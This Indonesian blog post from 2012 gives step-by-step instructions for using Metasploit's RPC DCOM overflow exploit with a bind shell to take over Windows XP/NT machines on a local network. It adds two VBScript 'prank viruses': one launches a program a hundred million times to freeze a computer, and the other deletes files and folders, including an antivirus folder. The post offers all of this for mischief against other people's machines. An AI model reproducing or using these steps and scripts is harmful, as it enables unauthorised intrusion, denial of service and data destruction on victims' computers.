Wednesday, December 26, 2012

uat kendalikan server jaringan LAN


Remote Shell Exploit
# Download metasploit trus install
# buka Metasploit web ataupun GUI (Buat belajar pake WEB atau GUI aja)
# cari exploit di Exploits -> windows -> dcerpc -> Microsoft RPC DCOM Interface Overflow (dari nama exploit nya dah tau kan ini untuk apa) atau ketik aja DCOM pada search kolom
# Pilih OS target mis. XP/NT
# pilih Generic/Shell_Bind_TCP Payload (Takeover Shell_blind di windows interface dengan memanfaatkan CMD)
# Masuka IP target (Scan jaringan dulu pake Nmap untuk tau ip lokal orang lain)
# berdoalah
# kalo muncul CMD korban berarti exploit berhasil mengoverflow dan silahkan kita bisa remote via shell  
Viruz buat Iseng

maaf gan bumpang posting bentar.... hehehehe
ane punya viruz iseng tpy lumyan dech bisa bikin hang kompi

caranya gampang mungkin yang senior udh tau
kwokwokw

1. Open Notepad
2. Copy Script yang ini
Quote:
option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
3. save Viruz.vbs
4. Klick foldernya

kwokwokwokwokw mudah-mudahan berguna buat orang yang mau iseng
yang ini masi bsa ga yah 
masukin notepad
klo ga salah nie virus buat menghapus file/ folder
Code:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)

Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”

0 comments:

DesignTemplate By : KBG KolomBlogGRATIS.blogspot.com